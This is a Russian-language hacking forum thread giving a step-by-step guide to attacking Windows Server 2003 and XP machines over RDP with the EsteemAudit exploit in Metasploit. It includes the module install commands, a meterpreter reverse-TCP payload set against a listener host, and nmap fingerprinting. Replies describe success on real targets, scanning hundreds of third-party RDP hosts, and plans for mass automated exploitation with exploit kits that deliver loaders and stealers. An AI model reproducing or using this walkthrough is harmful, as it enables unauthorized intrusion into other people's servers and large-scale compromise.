• Приглашаем на KubanCTF

    Старт соревнований 14 сентября в 10:00 по москве

    Ссылка на регистрацию в соревнованиях Kuban CTF: kubanctf.ru

    Кодебай является технологическим партнером мероприятия

Статья Взлом RDP windows 2017

Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3

Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)

Код:
mkdir /opt/metasploit-framework/modules/exploits/windows/rdp

затем копируем руби скрипт в эту же папку командой:

Код:
cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/

Для работы скрипта по требуются еще и файлы:

Код:
mkdir /usr/share/esteemaudit

копируем все в созданную нами папку:

Код:
cd files

cp * /usr/share/esteemaudit/

Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.

Screenshot_15.png


задаем атакуемый RHOST

и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp

и конечно же наладим обратную связь: set LHOST <свой IP>

и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS

а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:

nmap -sS -sC -sV -O -p3389 <атакуемый_IP>

Screenshot_16.png


и, exploit


Удачи!..) и хех, помните мою доброту!))
 
Последнее редактирование:

Demi

Mod. Ethical Hacking
16.02.2017
124
131
BIT
0
Статься отличная, спасибо за наводку, тесты прошли успешно, даже на реальных таргетах
 
C

Citizen13

Nmap scan report for ec2-34-215-49-193.us-west-2.compute.amazonaws.com (34.215.49.193)
Host is up.

PORT STATE SERVICE VERSION
3392/tcp filtered efi-lm
Too many fingerprints match this host to give specific OS details

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

Что не так?
Это мой личный дедик, но он не сканиться, есть еще 1 дедик уже не Амазон, его nmap вообще считает выключенным.
 

Demi

Mod. Ethical Hacking
16.02.2017
124
131
BIT
0
Nmap scan report for ec2-34-215-49-193.us-west-2.compute.amazonaws.com (34.215.49.193)
Host is up.

PORT STATE SERVICE VERSION
3392/tcp filtered efi-lm
Too many fingerprints match this host to give specific OS details

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

Что не так?
Это мой личный дедик, но он не сканиться, есть еще 1 дедик уже не Амазон, его nmap вообще считает выключенным.
попробуй добавить ключ -Pn
 
P

protector3000

что можно сделать если экспл. останавливается

[*] Started reverse TCP handler on 192.168.102.112:4444
[*] 192.168.102.108:3389 - Generating Esteemaudit XML data
[*] 192.168.102.108:3389 - Generating payload DLL for Esteemaudit
[*] 192.168.102.108:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 192.168.102.108:3389 - Launching Esteemaudit...
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3
У меня проблема с этой темой, а именно:

Когда проверяю около 300 адресов с открытими портами 3389 (адреса с трёх разных городов) через "nmap", проверяю на то какая ОС используется. То "nmap" говорит, что у них у всех - операционные системы "Oracle Virtualbox, QEMU, Cisco embedded" и подобные, не каких линуксов и виндовсов не показывает. И что то мне не верится что у всех 300 адресов установлен например "Oracle Virtualbox".
Я пробовал исправлять это дело так как говорят на официальном сайте "nmap" . То есть добавлял команду "-sU" - это не помогло. А так же использовал такую команду "nmap -O -sV -T4 -d <target>", которую советуют разработчики "nmap" использовать когда операционная система определяется не правильно. И делал я всё это опять же как советуют, отключая проводимость трафика через тор, я оставлял только один openvpn.
У меня есть мысль, что это как то связано с тем, что "kali" у меня как раз таки установлен на "Oracle Virtualbox" и возможно "nmap" считает, что мой "Oracle Virtualbox" принадлежит всем тем адресам, которые я сканирую.

Кто знает как решить?
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
То о чём я писал выше решается тем, что на виртуальной машине настраивается "сетевой мост" или ставим "kali" просто как одну из основных операционных систем.... После этого "nmap" начинает нормально сканировать...

Сейчас же у меня с этой темой такая проблема - постоянно пишет что "машина неуязвима".
И вообще у меня всё это как то подозрительно работает, потому что "metasploit" даже и не думает, а сразу же выдаёт - "машина не уязвима".

Так же слышал, что эта тема работает с машинами, у которых активирована доменная инфраструктура. Часто ли попадаются машины с доменной инфраструктурой?

Если ты прочитал это и думаешь что, есть вероятность того, что твой ответ мне как то поможет - то обязательно пиши )
 

non_logs

Green Team
29.12.2016
144
79
BIT
0
Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3

Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)

Код:
mkdir /opt/metasploit-framework/modules/exploits/windows/rdp

затем копируем руби скрипт в эту же папку командой:

Код:
cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/

Для работы скрипта по требуются еще и файлы:

Код:
mkdir /usr/share/esteemaudit

копируем все в созданную нами папку:

Код:
cd files

cp * /usr/share/esteemaudit/

Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.

Посмотреть вложение 11211

задаем атакуемый RHOST

и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp

и конечно же наладим обратную связь: set LHOST <свой IP>

и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS

а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:

nmap -sS -sC -sV -O -p3389 <атакуемый_IP>

Посмотреть вложение 11212

и, exploit


Удачи!..) и хех, помните мою доброту!))
Школьники отдыхают))
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Победил я эту тему, всё заработало у меня...
Если у кого то что то не получается по теме, то пишите мне в личку, помогу чем смогу. Но прежде чем писать, ставьте "Мне нравится" под этим сообщением )
 
Л

Литиум

Победил я эту тему, всё заработало у меня...
Если у кого то что то не получается по теме, то пишите мне в личку, помогу чем смогу. Но прежде чем писать, ставьте "Мне нравится" под этим сообщением )
Хороший стимул. (y)
 
  • Нравится
Реакции: Mitistofel

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Кто шарит, можно ли автоматизировать данную тему?
И ещё интересует - можно ли с одного ip одновременно пытаться ловить сессию с несколькими чужими ip. Будут ли конфликты?
 
Последнее редактирование:
  • Нравится
Реакции: Djon253

Djon253

Green Team
15.11.2017
120
93
BIT
2
автоматизация происходит через связку...если мы одно и то же думаем...
с одного ip можно получать много сессий...но насколько я знаю есть ограничение..
 
  • Нравится
Реакции: Atlasworld и Mitistofel

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
автоматизация происходит через связку...если мы одно и то же думаем...
Я имел в виду, что как сделать так, что бы сразу например одновременно задавать несколько значений "TARGETA", и сразу одновременно задавать несколько ip с которыми хотим поймать сессию...
с одного ip можно получать много сессий...но насколько я знаю есть ограничение..
Значит можно пытаться создавать одновременно несколько сессий - это хорошо...
 
  • Нравится
Реакции: Djon253

Djon253

Green Team
15.11.2017
120
93
BIT
2
тогда мы с вами думаем о том)))
массовое сканирование и проникновение....с последующим получением сессий...
 
  • Нравится
Реакции: Mitistofel

Djon253

Green Team
15.11.2017
120
93
BIT
2
связка эксплоитов....розничная цена от 4к$ и сильно выше....))))
или чуть чуть потренироваться в изучении кодерства а так же изучении материалов написания связок...
и дальше самому написать)))
думаю от полугода это займет времени))))

PS на гитхабе можно найти связки....например RIG...
 
  • Нравится
Реакции: Mitistofel и Vertigo

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
связка эксплоитов....розничная цена от 4к$ и сильно выше....))))
Это же относится и для тех случаев, когда хотим связать разные функции в одном эксплоите?
А с помощью "armitage" нельзя объединять функции внутри одного эксплоита? А то я одного человека понял так, что вроде бы с помощью "armitage" можно это осуществить (но это не точно)
 
Последнее редактирование:
  • Нравится
Реакции: Djon253

Djon253

Green Team
15.11.2017
120
93
BIT
2
берется эксплоит (уязвимость) или несколько эксплоитов - пишется связка...
пишется код, в котором при помощи связки производится атака на цель (или группу целей) для доставки полезной нагрузки (msfvenom, rat, loader, stiller, или что то еще)...
коротко как то так....немного простым языком....но суть от этого не меняется...

armitage, cobalt или еще что там....позволяет производить атаку только на единичную цель....на сколько я знаю...может быть можно присобачить какие то модули для массовой атаки..... но я так глубоко не копал...))))
 
  • Нравится
Реакции: Mitistofel
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!